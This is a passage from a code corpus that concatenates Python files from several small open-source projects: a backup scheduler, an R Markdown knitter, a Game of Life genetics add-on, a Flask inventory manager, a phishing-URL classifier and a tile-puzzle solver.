# threshold should be << than window width, but > cron granularity
# this method assumes that the cron string minutes column is *, ie
# cron granularity is 1min and min window width is 1hr.
threshold = timedelta(minutes=2)
window_iter = croniter(windowstr, last_time)
while(True):
next_time = window_iter.get_next(datetime)
if next_time - last_time < threshold:
# logger.debug(
# 'next:' + str(next_time) +
# ' last:' + str(last_time)
# )
if last_time > time_to_give_up:
logger.warn(
"Search for end of window exceeded MAX_DELTA (" +
str(MAX_DELTA) + ")"
)
return _max_window_edges()
else:
last_time = next_time
else:
logger.debug("running until " + str(last_time))
logger.debug("will resume at " + str(next_time))
return last_time, next_time
```
#### File: backdat/backdat/DuplicateLogFilter.py
```python
import logging
class DuplicateLogFilter(logging.Filter):
"""
This filter prevents duplicate messages from being printed repeatedly.
Adapted from https://stackoverflow.com/a/44692178/1483986
"""
def filter(self, record):
# add other fields if you need more granular comparison, depends on your app
current_log = (record.module, record.levelno, record.msg)
if current_log != getattr(self, "last_log", None):
self.last_log = current_log
return True
return False
```
#### File: backdat/file_parsers/fileset.py
```python
import csv
import os
from datetime import timedelta
import logging
# import pprint # needed for debugging only
default_fileset_path="/etc/opt/backdat/fileset.tsv"
class STAT_KEYS:
SIZE = 'size'
SOURCE = 'filepath'
TARGET = 'target'
UPLOAD_TIME = 'ul_time'
def get_upload_size(fileset_path=default_fileset_path):
"""
returns:
total size of all uploads in this host's fileset.tsv
"""
logger = logging.getLogger(__name__)
logger.debug("=== file stats ===")
total_size = 0
for fstat in get_fileset_statlist(fileset_path):
logger.debug("{} : {}b".format(fstat[STAT_KEYS.SOURCE].split('/')[-1], fstat[STAT_KEYS.SIZE]))
total_size += fstat[STAT_KEYS.SIZE]
logger.debug("=== ==== ===== ===")
return total_size
def get_fileset_statlist(cfgfilename=default_fileset_path):
"""
reads given fileset.tsv and outputs list of stats for the files in the
following form:
[
{
filepath: "/home/me/example_file.txt",
target: "gdrive-me:/example/remote/target/dir/"
size: 1024,
ul_time: 300
}, {...}, {...}
]
"""
statlist = []
with open(cfgfilename,'r') as tsvin:
reader = csv.reader(tsvin, delimiter='\t')
for row in reader:
if len(row) < 1 or row[0].startswith('#'): # ignore comment lines
pass
else:
src_filepath = row[0].strip()
file_paths = [] # List which will store all of the filepaths.
if "*" in src_filepath:
src_filepath = src_filepath.replace("*", "")
# Walk the tree.
for root, directories, files in os.walk(src_filepath):
for filename in files:
# Join the two strings to form the full filepath.
filepath = os.path.join(root, filename)
file_paths.append(filepath) # Add it to the list.
elif os.path.isdir(src_filepath):
# dir we want to upload all at once
file_paths = [src_filepath]
if file_paths[-1] != '/': # assert last char is '/'
file_paths += '/'
else: # is file
file_paths = [src_filepath]
for src_filename in file_paths:
target_dirmap = row[1].strip()
# stat file(s)
size = os.stat(src_filename).st_size # in Bytes [B]
# estimate upload time
# TODO: make estimate here?
# float(size)/ul_speed
# setup_time = 120 # [s]
# ul_est = timedelta(seconds=(ul_time + setup_time))
ul_est = None
statlist.append({
STAT_KEYS.SOURCE: src_filename,
STAT_KEYS.TARGET: target_dirmap,
STAT_KEYS.SIZE: size,
STAT_KEYS.UPLOAD_TIME: ul_est
})
#pp = pprint.PrettyPrinter(indent=4)
#pp.pprint(statlist)
return statlist
```
#### File: backdat/RemoteInterface/rclone_test.py
```python
from unittest import TestCase
try:
# py2
from mock import MagicMock
except ImportError:
# py3
from unittest.mock import MagicMock
# dependencies:
from backdat.RemoteInterface import rclone
class Test_rclone_driver(TestCase):
# tests:
#########################
def test_parse_elapsed_time_seconds_only(self):
""" test parse elapsed on seconds only output """
result = rclone.parse_time_spent("Elapsed time: 27.9s")
self.assertEqual(result, 28)
def test_parse_elapsed_time_min_n_sec(self):
""" test parse elapsed time min+sec """
result = rclone.parse_time_spent("Elapsed time: 18m27.9s")
self.assertEqual(result, 1108)
def test_parse_elapsed_time_hr_min_sec(self):
""" test parse elapsed time hr+min+sec """
result = rclone.parse_time_spent("Elapsed time: 1h18m27.9s")
self.assertEqual(result, 4708)
``` |
{
"source": "7yl4r/eggsmark",
"score": 2
} |
#### File: eggsmark/eggsmark/xmd_knit.py
```python
from subprocess import run
import os.path
import logging
from eggsmark.get_chunks import get_chunks
from eggsmark.get_param_eggs import get_header_param_eggs
def knit(
input_path, output_path, verbose=0, quiet=False
):
logger = logging.getLogger("eggsmark.{}".format(
__name__,
))
OUT_DIR, OUT_FILENAME = os.path.split(output_path)
tmp_path = "/tmp/{}.Rmd".format(os.path.basename(input_path))
logger.info("creating tmp files...")
run([
'cp',
input_path,
tmp_path
])
logger.info("knitting...")
# TDOO: DO THIS:
with open(input_path) as f_obj:
param_eggs = get_header_param_eggs(f_obj.readlines())
for chunk, chunk_info in get_chunks(f_obj.readlines()):
if chunk_info['language'] == "python":
result_output, new_eggs = knit_chunk(chunk, param_eggs)
# # param_eggs.extend(new_eggs)
# TODO: replace_in_output_file(chunk_info, result_output)
# # b. inject output
# TODO: INSTEAD OF THIS:
result = run([
'R',
'-e',
(
'rmarkdown::render('
'"{}", '
'output_dir="{}", '
'output_file="{}"'
')'
).format(tmp_path, OUT_DIR, OUT_FILENAME)
])
print(result)
# TODO: assert result is zero or...?
``` |
{
"source": "7yl4r/LifeGenes",
"score": 3
} |
#### File: LifeGenes/lifegenes_core/cellList.py
```python
from .cell import Cell
import pickle
import logging
# a generalized list of cells
# FIELDS:
# cells - a list of cell objects
# PUBLIC METHODS:
# findCell - locate a cell by x,y coords
# killCellAt - remove a cell by x,y coords
# save - save cellList to file
# load - load cellList from file
# set - make this list into a copy of given list
class cellList:
def __init__(self,pattern):
self.cells = list()
# add cell object to list for each pair in pattern
for cellIndex in range(len(pattern)/2):
self.cells.append(Cell(pattern[cellIndex*2],pattern[cellIndex*2+1]))
cellIndex+=1
def setCell(self,x,y,dna=None,cell=None):
if cell != None:
self.killCellAt(x,y) #remove old cell if exists
self.cells.append(cell) #add new cell
elif dna != None:
self.KillCellAt(x,y)
self.cells.append(cell(x,y,dna))
else:
raise ValueError("setCell requires dna or cell object be specified")
def findCell(self,x,y):
# retuns cell object with given coords
for c in self.cells:
if c.x==x and c.y==y:
return c
#implied else
return None
def killCellAt(self,x,y):
# deletes cell at given loc. Returns True for sucessful deletion, False for cell not found.
for c in self.cells:
if c.x==x and c.y==y:
self.cells.remove(c)
return True
else: return False
def save(self,fname):
# saves the cell list to the given file name
with open(fname,'wb') as f:
pickle.dump(self, f, pickle.HIGHEST_PROTOCOL)
def load(self,fname):
# loads the cell list from the given file name
with open(fname,'rb') as f:
newList = pickle.load(f)
try:
check = newList.cells[0]
except (AttributeError, IndexError) as err:
logging.error('loaded list seems to have no cells!')
raise err
#implied else
self.set(newList)
logging.info(str(len(self.cells))+' cells loaded from file')
#except: logging.error('cellList load appears to have failed. dir(cellList)='+str(dir(self)))
def set(self,cList):
# makes the cell list a copy of the given cellList
self.cells = cList.cells
```
#### File: LifeGenes/lifegenes_core/genetic_sampler.py
```python
import golly as g
from LifeGenes.lifegenes_core.cellList import cellList
from LifeGenes.lifegenes_core.environment import environment
from LifeGenes.lifegenes_core.cellPallate import CELL_COLLECTION_DIR, cellPallate
import logging
def collect_dna():
# prepare environment
env = environment()
# ask user to select cell of interest
g.setcursor("Pick")
g.show('select cell to sample')
event = g.getevent(True) #turn on golly event script access
while not event.startswith("click"):
event = g.getevent() # return event handling to golly
# event is a string like "click 10 20 left none"
g.getevent(False) # return event handling to golly
evt, xstr, ystr, butt, mods = event.split()
x = int(xstr)
y = int(ystr)
logging.info('cell ('+xstr+','+ystr+') selected')
try:
# retrieve selected cell
selectedCell = env.cellList.findCell(x,y)
except AttributeError:
g.show('cannot find cell!')
logging.error('cell not found. len(cellList)='+str(len(cellList.cells)))
env.teardown()
return
# prompt user for name
import Tkinter as tk
root = tk.Tk()
class selectorDisplay:
def __init__(self, master, selectedCell):
self.pallate = cellPallate() # cell pallate instance for saving cell info
self.frame = tk.Frame(master)
self.frame.pack()
self.cell = selectedCell
instructions = tk.Label(root, text='Please enter a name for this cell.\n\
NOTE: names should only consist of letters, numbers, "_", and "-"')
instructions.pack()
self.entry = tk.Entry(master)
self.entry.pack()
self.entry.focus_set()
button_save = tk.Button(master, text="save", width=10,
command=self.submitEntry)
button_save.pack()
button_cancel = tk.Button(master, text="cancel", width=10,
command=self.frame.quit)
button_cancel.pack()
def submitEntry(self):
# save the cell
name = self.entry.get()
g.show('saving ' + name + ' to ' + CELL_COLLECTION_DIR)
self.pallate.saveCell(self.cell,name)
self.frame.quit() # close dialog
g.show('DNA sample saved to collection')
app = selectorDisplay(root,selectedCell)
root.mainloop()
import _tkinter
try:
root.destroy() # optional...ish
except _tkinter.TclError:
pass # ignore failed destroy due to already being destroyed.
env.teardown()
return
# make DNA display?
#from Tkinter import *
#root = Tk()
#w = Label(root, text="Hello, world!")
#w.pack()
#root.mainloop()
```
#### File: LifeGenes/lifegenes_core/setupLog.py
```python
# appending to the file as the script is run multiple times
from os.path import expanduser,join
from os import makedirs
import logging
from LifeGenes.lifegenes_core.__util.appdirs import user_log_dir
def setupLog(logName='noName.txt'):
logDir = user_log_dir('LifeGenes','7yl4r-ware')
try:
makedirs(logDir)
except OSError:
pass # probably the dir already exists...
logPath = join(logDir,logName)
logging.basicConfig(filename=logPath,\
level=logging.DEBUG,\
format='%(asctime)s %(levelname)s:%(message)s',\
filemode='w')
# # assume that you want your logs in LifeGenes source which is in your home directory
# # (this works best on my linux machine)
# home = expanduser("~")
# logDir = home+'/LifeGenes/__logs'
# try:
# mkdir(logDir)
# except OSError:
# pass # probably the dir already exists...
#
# logPath = logDir+'/'+logName
# print str(logging.getLogger())
# logging.basicConfig(filename=logPath,\
# level=logging.DEBUG,\
# format='%(asctime)s %(levelname)s:%(message)s',\
# filemode='w')
try:
import golly as g
g.show('created .log at '+str(logPath))
except ImportError:
print 'created .log at '+str(logPath)
```
#### File: lifegenes_core/tests/folly.py
```python
import logging
class follyInstance:
def __init__(self):
# change these values to test different start-cases:
logging.warn('using mock-GoL "folly"')
self.currentLayer = 0
self.curLayerEmpty= False
self.layerColors = [[0,255]]
self.layerNames = ['first!'] #i'm not sure what this actually looks like in golly
self.layerRules = ['life']
self.nLayers = 1
self.maxLayers = 10
self.generation = 0
self.getcellsconfig= 'const growing'#'const change 1k' #'no change 1k' #'no change few'
def show(self,s):
#prints a string somewhere (to the console in this case)
print s
return
# golly behavior:
#Add a new, empty layer immediately after the current layer and return the new layer's index,
# an integer from 0 to numlayers() - 1.
# The new layer becomes the current layer and inherits most of the previous layer's settings,
# including its algorithm, rule, scale, location, cursor mode, etc.
# The step exponent is set to 0, there is no selection, no origin offset, and the layer's initial name is "untitled".
def addlayer(self):
if self.nLayers+1 >= self.maxLayers:
print 'ERR: attempt to add layer above maxlayers'
else:
self.layerNames.append('untitled')
self.layerColors.append(self.layerColors[self.getlayer()])
self.layerRules.append(self.layerRules[self.getlayer()])
self.currentLayer = self.nLayers
self.nLayers+=1
return self.currentLayer
def clear(self,where=0):
if where==0:
#clear inside
return
elif where==1:
#clear outside
return
else:
raise ValueError('clear() expects 1 or 0 only')
# golly behavior:
# Return True if the universe is empty or False if there is at least one live cell.
# This is much more efficient than testing getpop() == "0".
def empty(self):
return self.curLayerEmpty
def randfill(self,int):
# fills the current selection with given percentage density
return
def exit(self,msg):
print 'requested exit via exit() method with message:'
print msg
exit()
def getcell(self,x,y):
return 1
# goly behavior:
#Return any live cells in the specified rectangle as a cell list.
# The given list can be empty (in which case the cell list is empty)
# or it must represent a valid rectangle of the form [x,y,width,height].
def getcells(self,boundingRect):
if self.getcellsconfig == 'no change few':
# return a couple of cells:
return [0 ,1,\
1 ,1,\
1 ,0,\
0 ,0]
elif self.getcellsconfig == 'no change 1k':
# return the same many cells every time:
cellList = list()
for cellN in range(1000):
cellList.append(cellN) #x loc
cellList.append(0) #y loc
return cellList
elif self.getcellsconfig == 'const change 1k':
# return different 1k cells every time, i.e. all cells in last generation die and are replaced
cellList = list()
for cellN in range(1000):
cellList.append(cellN)
cellList.append(self.generation)
return cellList
elif self.getcellsconfig == 'const growing':
# return a list of cells which grows a const amount each generation and no cells ever die
cellList = list()
for cellN in range( (self.generation+1)*100):
cellList.append(cellN)
cellList.append(0)
return cellList
else:
self.exit('ERR: unrecognized getcellsconfig string')
# matches golly behavior:
# Return the index of the current layer, an integer from 0 to numlayers() - 1.
def getlayer(self):
return self.currentLayer
def getname(self,index):
return self.layerNames[index]
#golly behavior:
# Return the current pattern's bounding box as a list.
# If there is no pattern then the list is empty ([]),
# otherwise the list is of the form [x,y,width,height].
def getrect(self):
return [0,0,101,121]
def maxlayers(self):
return self.maxlayers;
def numlayers(self):
return self.nLayers
def select(self,list):
return
def setcell(self,x,y,val):
#yeah... whatever...
return
def setcolors(self,colors):
self.layerColors[self.getlayer()] = colors
def setlayer(self,layern):
self.currentlayer = layern
def setname(self,name):
self.layerNames[self.getlayer()] = name
def setrule(self,rule):
self.layerRules[self.getlayer()] = rule
def show(self,msg):
print msg
return
def step(self):
self.generation+=1
return
def update(self):
return
folly = follyInstance()
``` |
{
"source": "7zmau/inv-man",
"score": 2
} |
#### File: inv-man/invman/__init__.py
```python
import os
from flask import Flask
def create_app():
app = Flask(__name__)
app.config.from_mapping(
SECRET_KEY='dev',
DATABASE=os.path.join(app.instance_path, 'invman.sqlite'),
)
try:
os.makedirs(app.instance_path)
except OSError:
pass
from . import start
app.register_blueprint(start.bp)
from . import main
app.register_blueprint(main.bp)
from . import db
db.init_app(app)
return app
```
#### File: inv-man/invman/main.py
```python
from flask import (
Blueprint,
render_template,
request,
url_for,
g,
redirect,
session,
jsonify,
)
from invman.db import get_db
from invman.start import login_required
bp = Blueprint("main", __name__, url_prefix="/main")
def product_list(id):
""" Retrieves products which are in the product table. """
db = get_db()
product_list = db.execute(
"SELECT product_id, product_name, quantity FROM product WHERE for_business = ? AND quantity > 0",
(id,),
).fetchall()
return product_list
def get_product(location, product_id, quantity):
""" Used by the movement route to get a product from a location. """
product_array = []
db = get_db()
b_id = session.get("user_id")
if location == "product_factory":
# Get product from product table, deduct the quantity
ogquantity = db.execute(
"SELECT quantity FROM product WHERE product_id = ? AND for_business = ?",
(product_id, b_id,),
).fetchone()[0]
newquantity = ogquantity - quantity
if int(newquantity) < 0:
raise Exception("Invalid quantity.")
query = (
"UPDATE product SET quantity = ? WHERE product_id = ? AND for_business = ?"
)
db.execute(query, (newquantity, product_id, b_id))
p = db.execute(
"SELECT product_id FROM product WHERE for_business = ? AND product_id = ?",
(b_id, product_id,),
).fetchone()
product_array = list(p)
product_array.append(quantity)
db.commit()
return product_array
else:
ogquantity = db.execute(
"SELECT qty FROM warehouse WHERE loc_id = ? AND prod_id = ? AND b_id = ?",
(location, product_id, b_id,),
).fetchone()[0]
newquantity = ogquantity - quantity
if int(newquantity) < 0:
raise Exception("Invalid quantity.")
query = (
"UPDATE warehouse SET qty = ? where loc_id = ? AND prod_id = ? AND b_id = ?"
)
db.execute(query, (newquantity, location, product_id, b_id,))
p = db.execute(
"SELECT prod_id FROM warehouse WHERE prod_id = ? AND loc_id = ? AND b_id = ?",
(product_id, location, b_id,),
).fetchone()
if int(newquantity) == 0:
db.execute(
"DELETE FROM warehouse WHERE b_id = ? AND prod_id = ? AND loc_id = ?",
(b_id, product_id, location,),
)
product_array = list(p)
product_array.append(quantity)
db.commit()
return product_array
def set_product(location, product_array):
""" Used by the movement route to set a product to a location. """
db = get_db()
b_id = session.get("user_id")
product_id = product_array[0]
quantity = product_array[1]
if location != "Move out":
product_exists = db.execute(
"SELECT * FROM warehouse WHERE prod_id = ? AND loc_id = ? AND b_id = ?",
(product_id, location, b_id),
).fetchone()
if product_exists:
ogquantity = db.execute(
"SELECT qty FROM warehouse WHERE loc_id = ? AND prod_id = ? AND b_id = ?",
(location, product_id, b_id,),
).fetchone()[0]
newquantity = ogquantity + quantity
query = "UPDATE warehouse SET qty = ? WHERE loc_id = ? AND prod_id = ? AND b_id = ?"
db.execute(query, (newquantity, location, product_id, b_id,))
db.commit()
else:
db.execute(
"INSERT INTO warehouse (b_id, prod_id, qty, loc_id) values (?, ?, ?, ?)",
(b_id, product_id, quantity, location),
)
db.commit()
def balance_quantity(quantity, product_id, location):
""" Used by the product route to add or subtract quantity of a product."""
db = get_db()
if location == "product_factory":
ogquantity = db.execute(
"SELECT quantity from product WHERE product_id = ?", (product_id,)
).fetchone()
ogquantity = ogquantity["quantity"]
newquantity = ogquantity + quantity
if int(newquantity) < 0:
raise Exception("Invalid quantity.")
query = "UPDATE product SET quantity = ? where product_id = ?"
db.execute(query, (newquantity, product_id))
db.commit()
@bp.route("/<id>/delete", methods=("GET",))
def delete(id):
""" Used by the product page to delete a product. Doesn't actually delete it, just sets the quantity to 0. """
db = get_db()
b_id = session.get("user_id")
query = "UPDATE product SET quantity = 0 WHERE product_id = ? AND for_business = ?"
db.execute(query, (id, b_id,))
db.commit()
return redirect(url_for("main.products"))
@bp.route("/")
def root():
return redirect(url_for("main.products"))
@bp.route("/products", methods=("GET", "POST"))
@login_required
def products():
""" The product route. """
db = get_db() # Get the database connection.
b_id = session.get("user_id")
error = None
# Request to add/update a product to the product table.
if request.method == "POST":
if "submit_product" in request.form:
try:
prod_id = request.form["insert_product_id"]
prod_name = request.form["insert_product_name"]
prod_qty = int(request.form["insert_product_qty"])
if prod_qty < 0:
raise Exception("Invalid quantity.")
db.execute(
"INSERT INTO product (product_id, product_name, quantity, for_business) values (?, ?, ?, ?)",
(prod_id, prod_name, prod_qty, b_id,),
)
db.commit()
except Exception as e:
if "UNIQUE constraint failed" in str(e):
error = "Error adding product: A product with that ID already exists or has been created before."
elif "invalid literal for int() with base 10:" in str(e):
error = "Invalid quantity."
else:
error = str(e)
return render_template(
"products.html",
title="Products",
products=product_list(b_id),
error=error,
)
if "update_product" in request.form:
try:
prod_selected = request.form["select_product"].split(",")[0]
prod_name = request.form["update_product_name"]
prod_qty = int(request.form["update_product_qty"])
if prod_name:
query = "UPDATE product SET product_name = ? WHERE product_id = ?"
db.execute(query, (prod_name, prod_selected))
db.commit()
balance_quantity(
prod_qty, prod_selected, location="product_factory",
)
db.commit()
except Exception as e:
if "invalid literal for int() with base 10:" in str(e):
error = "Invalid quantity."
else:
error = str(e)
return render_template(
"products.html",
title="Products",
products=product_list(b_id),
error=error,
)
else:
pass
# Retrieve and display products on the page.
prod_list = product_list(b_id)
return render_template(
"products.html", products=prod_list, title="Products", error=error
)
@bp.route("/<lid>/deleteloc", methods=("GET",))
def delete_loc(lid):
""" Used by the location page to delete a location. Also deletes any products at that location. """
db = get_db()
b_id = session.get("user_id")
db.execute(
"DELETE FROM location WHERE location_id = ? AND for_business = ?", (lid, b_id,)
)
db.commit()
db.execute("DELETE FROM warehouse WHERE loc_id = ? AND b_id = ?", (lid, b_id,))
db.commit()
return redirect(url_for("main.locations"))
@bp.route("/locations", methods=("GET", "POST"))
@login_required
def locations():
""" The location route. """
db = get_db() # Get the database connection
b_id = session.get("user_id")
error = None
# Request to add a location to the location table.
if request.method == "POST":
if "submit_location" in request.form:
try:
loc_id = request.form["insert_location_id"]
loc_name = request.form["insert_location_name"]
db.execute(
"INSERT INTO location (location_id, location_name, for_business) values(?, ?, ?)",
(loc_id, loc_name, b_id,),
)
db.commit()
except Exception as e:
if "UNIQUE constraint failed:" in str(e):
error = "Location with that ID already exists."
else:
error = str(e)
location_list = db.execute(
"SELECT location_id, location_name FROM location where for_business = ?",
(b_id,),
).fetchall()
return render_template(
"locations.html",
title="Locations",
locations=location_list,
error=error,
)
if "update_location" in request.form:
try:
loc_selected = request.form["select-location"].split(",")[0]
new_locname = request.form["location-name-update"]
db.execute(
"UPDATE location SET location_name = ? WHERE location_id = ?",
(new_locname, loc_selected,),
)
db.commit()
except Exception as e:
error = str(e)
location_list = db.execute(
"SELECT location_id, location_name FROM location where for_business = ?",
(b_id,),
).fetchall()
return render_template(
"locations.html",
title="Locations",
locations=location_list,
error=error,
)
else:
pass
# Retrieve locations and render the page.
location_list = db.execute(
"SELECT location_id, location_name FROM location where for_business = ?",
(b_id,),
).fetchall()
return render_template(
"locations.html", title="Locations", locations=location_list, error=error
)
def check_warehouse():
""" Returns a list of location IDs which has products stored """
db = get_db()
b_id = session.get("user_id")
query = "SELECT loc_id FROM warehouse where b_id = ?"
warehouses = db.execute(query, (b_id,)).fetchall()
loc_list = []
for lids in warehouses:
if lids[0] not in loc_list:
loc_list.append(lids[0])
return loc_list
@bp.route("/_loadproducts/<lid>", methods=("GET",))
def loadproducts(lid):
""" Used by the movement page to retrieve products at a particular location. """
db = get_db()
b_id = session.get("user_id")
product_list = {}
if lid == "Products":
query = "SELECT product_id, product_name FROM product WHERE for_business = ? AND quantity > 0"
warehouses = db.execute(query, (b_id,)).fetchall()
for products in warehouses:
product_list[products[0]] = products[1]
else:
query = "SELECT prod_id FROM warehouse where loc_id = ? AND b_id = ?"
warehouses = db.execute(query, (lid, b_id,)).fetchall()
for products in warehouses:
product_name = db.execute(
"SELECT product_name FROM product WHERE product_id = ? AND for_business = ?",
(products["prod_id"], b_id,),
).fetchone()
product_list[products["prod_id"]] = product_name["product_name"]
return jsonify(product_list)
@bp.route("/_getquantity/<prd>/<loc>", methods=("GET",))
def getquantity(prd, loc):
""" Used by the movement page to get the quantity of a product."""
db = get_db()
b_id = session.get("user_id")
qty = {}
if loc == "Products":
if prd != "None":
q = db.execute(
"SELECT quantity FROM product WHERE product_id = ? AND for_business = ?",
(prd, b_id,),
).fetchone()
qty["qty"] = str(q["quantity"])
else:
pass
else:
q = db.execute(
"SELECT qty FROM warehouse WHERE prod_id = ? AND b_id = ? AND loc_id = ?",
(prd, b_id, loc,),
).fetchone()
qty["qty"] = str(q["qty"])
return qty
def products_at_locations():
""" Creates a dictionary with loc IDs as keys and products stored there as values """
db = get_db()
b_id = session.get("user_id")
locs = check_warehouse()
warehouse = {}
for ids in locs:
l = []
prods = db.execute(
"SELECT prod_id, qty FROM warehouse where b_id = ? AND loc_id = ?",
(b_id, ids,),
).fetchall()
locname = db.execute(
"SELECT location_name FROM location WHERE location_id = ? AND for_business = ?",
(ids, b_id,),
).fetchone()["location_name"]
for data in prods:
prodname = db.execute(
"SELECT product_name FROM product WHERE for_business = ? AND product_id = ?",
(b_id, data["prod_id"],),
).fetchone()["product_name"]
l.append([data["prod_id"] + " " + prodname, data["qty"]])
warehouse[locname] = l
return warehouse
def logmovements(
movement_id, from_location, to_location, prod_id, qty,
):
db = get_db()
b_id = session.get("user_id")
if from_location == "Products":
from_location = "Products"
if to_location == "Move out":
to_location = "MO"
db.execute(
"INSERT INTO movement (movement_id, from_location, to_location, prod_id, qty, b_id)"
"VALUES (?, ?, ?, ?, ?, ?)",
(movement_id, from_location, to_location, prod_id, qty, b_id,),
)
db.commit()
@bp.route("/movement", methods=("GET", "POST",))
@login_required
def movements():
""" Movement route. """
db = get_db()
b_id = session.get("user_id")
error = None
if request.method == "POST":
# movement request - move product to a location
try:
move_from = request.form["select-location"].split(",")[0]
product_id = request.form["choose-product"].split(",")[0]
quantity = int(request.form["quantity"])
move_to = request.form["move-to"].split(",")[0]
if quantity < 0:
raise Exception("Invalid quantity.")
if move_from == "Products":
moveid = "P-"
product_array = get_product("product_factory", product_id, quantity)
else:
moveid = move_from + "-"
product_array = get_product(move_from, product_id, quantity)
set_product(move_to, product_array)
if move_to == "Move out":
moveid += "MO"
else:
moveid += move_to
logmovements(moveid, move_from, move_to, product_id, quantity)
prod_list = product_list(b_id)
move_to = db.execute(
"SELECT location_id, location_name FROM location WHERE for_business = ?",
(b_id,),
).fetchall()
warehouses = check_warehouse()
movefrom_list = []
for lids in warehouses:
query = "SELECT location_id, location_name FROM location where location_id = ?"
l_list = db.execute(query, (lids,)).fetchone()
movefrom_list.append(l_list)
locations_with_products = products_at_locations()
return render_template(
"movement.html",
title="Movement",
movefrom=movefrom_list,
products=prod_list,
moveto=move_to,
locationmap=locations_with_products,
error=error,
)
except Exception as e:
if "'NoneType' object is not subscriptable" in str(e):
error = "Error moving: Invalid product."
else:
error = "Error moving: " + str(e)
# Retrieve products from the products table
prod_list = product_list(b_id)
# Retrieve all locations
move_to = db.execute(
"SELECT location_id, location_name FROM location WHERE for_business = ?",
(b_id,),
).fetchall()
# Get all locations which have products stored.
warehouses = check_warehouse()
# Creates a list of those locations along with their names.
movefrom_list = []
for lids in warehouses:
query = "SELECT location_id, location_name FROM location where location_id = ?"
l_list = db.execute(query, (lids,)).fetchone()
movefrom_list.append(l_list)
locations_with_products = products_at_locations()
return render_template(
"movement.html",
title="Movement",
movefrom=movefrom_list,
products=prod_list,
moveto=move_to,
locationmap=locations_with_products,
error=error,
)
@bp.route("/movementlogs", methods=("GET", "POST",))
@login_required
def movementlogs():
""" Movement logs route. """
db = get_db()
b_id = session.get("user_id")
logtable = db.execute("SELECT * FROM movement WHERE b_id = ?", (b_id,)).fetchall()
business_name = db.execute(
"SELECT business_name FROM business WHERE business_id = ?", (b_id,)
).fetchone()
return render_template(
"movementlogs.html",
logtable=logtable,
business_name=business_name,
title="Logs",
)
@bp.route("/logout")
def logout():
session.clear()
return redirect(url_for("start.index"))
```
#### File: inv-man/invman/start.py
```python
import functools
from flask import Blueprint, render_template, request, url_for, flash, redirect, session, g
from invman.db import get_db
bp = Blueprint('start', __name__)
@bp.route('/', methods=('GET', 'POST'))
def index():
db = get_db()
error = None
if g.user:
return redirect(url_for('main.products'))
if request.method == 'POST':
if 'login' in request.form:
business_id = request.form['registered_b_id']
business = db.execute('SELECT * FROM business WHERE business_id = ?', (business_id,)).fetchone()
if business:
session.clear()
session['user_id'] = business['business_id']
g.user = get_db().execute('SELECT * FROM business WHERE business_id = ?', (business_id,)).fetchone()
return redirect(url_for('main.products'))
else:
error = 'Incorrect ID'
flash(error)
elif 'register' in request.form:
new_business_id = request.form['create_b_id']
new_business_name = request.form['create_b_name']
if new_business_id and new_business_name:
business_exists = db.execute('SELECT * FROM business WHERE business_id = ?', (new_business_id,)).fetchone()
if not business_exists:
db.execute('INSERT INTO business (business_id, business_name) VALUES (?, ?)', (new_business_id, new_business_name))
db.commit()
return redirect(url_for('start.created'))
else:
error = 'Business ID already exists'
else:
error = 'Please enter a business ID and Name'
flash(error)
return render_template('index.html', title='Home')
@bp.before_app_request
def load_logged_in_user():
user_id = session.get('user_id')
if user_id is None:
g.user = None
else:
g.user = get_db().execute(
'SELECT * FROM business WHERE business_id = ?', (user_id,)
).fetchone()
@bp.route('/created')
def created():
return '<h5>Business Created</h5><br>You can now <a href="/">login</a>'
def login_required(view):
@functools.wraps(view)
def wrapped_view(**kwargs):
if g.user is None:
return redirect(url_for('start.index'))
return view(**kwargs)
return wrapped_view
``` |
{
"source": "7zones/Phishing-detection-ML",
"score": 3
} |
#### File: 7zones/Phishing-detection-ML/model.py
```python
from tensorflow.keras.layers import Embedding, Flatten, Dense, LSTM, Bidirectional, Dropout, BatchNormalization, GRU, Conv1D, GlobalAveragePooling1D, GlobalMaxPooling1D
from tensorflow.keras.models import Sequential, Model
import tensorflow as tf
class ConvModel(tf.keras.Model):
def __init__(self, num_chars, embedding_vector_length, maxlen):
super(ConvModel, self).__init__()
#model
self.embedding_layers = tf.keras.layers.Embedding(num_chars, embedding_vector_length, input_length=maxlen)
self.conv = tf.keras.layers.Conv1D(256, 4, activation='relu')
self.fc1 = tf.keras.layers.Dense(128, activation = "relu")
self.fc = tf.keras.layers.Dense(1, activation = "sigmoid")
def call(self, inputs, training=False):
embedding = self.embedding_layers(inputs)
conv = self.conv(embedding)
conv_max = tf.reduce_max(conv, axis = 1)
fc1 = self.fc1(conv_max)
output = self.fc(fc1)
return output
``` |
{
"source": "80085/professorspelet",
"score": 4
} |
#### File: professorspelet/professorspelet/professorspelet.py
```python
import copy
class Puzzle:
"""
Professorspelet consists of a 4x4 grid that shall be filled with tiles,
each of which has 4 body parts in different colors on each edge.
The tiles must be place in such a way that all edges must create one
complete Professor.
"""
def __init__(self, tiles: list):
"""
Initialize a puzzle with a list of tiles that shall be placed. The list can be empty or
contain only a few Professors, but must not exceed 16.
"""
if len(tiles) > 16:
raise ValueError(f'Maximum number of Professor tiles that can be placed is 16, was: {len(tiles)}')
self.grid = [None] * 16
self._solve(copy.deepcopy(tiles))
def solution(self):
"""
Return a list of tiles placement for a valid solution. The tiles are indexed 0-15 and should be placed
starting from top left corner with a column width of 4.
"""
return [(e, str(tile)) for e, tile in enumerate(self.grid) if tile is not None]
def _solve(self, tiles: list, current_index: int=0):
if not tiles:
return True
for tile in tiles:
for i in range(4):
if self._can_place_tile(tile, current_index):
self.grid[current_index] = tile
tiles.remove(tile)
if self._solve(tiles, current_index + 1):
return True
self.grid[current_index] = None
tiles.append(tile)
tile.rotate()
return False
def _can_place_tile(self, tile, ind):
if self.grid[ind] is not None:
raise ValueError(f'Index={ind} is not empty')
if ind > 3:
other = self.grid[ind - 4]
if other is not None and not other.bottom().matches(tile.top()):
return False
if ind < 12:
other = self.grid[ind + 4]
if other is not None and not other.top().matches(tile.bottom()):
return False
if ind % 4 != 0:
other = self.grid[ind - 1]
if other is not None and not other.right().matches(tile.left()):
return False
if ind % 4 != 3:
other = self.grid[ind + 1]
if other is not None and not other.left().matches(tile.right()):
return False
return True
class Tile:
"""
A tile consisting of four professor halves - two upper and two lower
"""
def __init__(self, professors):
"""
Create a card with four professors, starting at the top in a clockwise direction
"""
if len(professors) != 4:
raise ValueError('Expected four professor parts')
bodies = list(map(lambda x: x.body, professors))
if bodies.count('upper') != bodies.count('lower'):
raise ValueError('Expected equal number of upper and lower body parts')
self.professors = professors
self.rotation = 0
def __str__(self):
return f'Top: {self.top()}, Right: {self.right()}, Bottom: {self.bottom()}, Left: {self.left()}'
def top(self):
"""
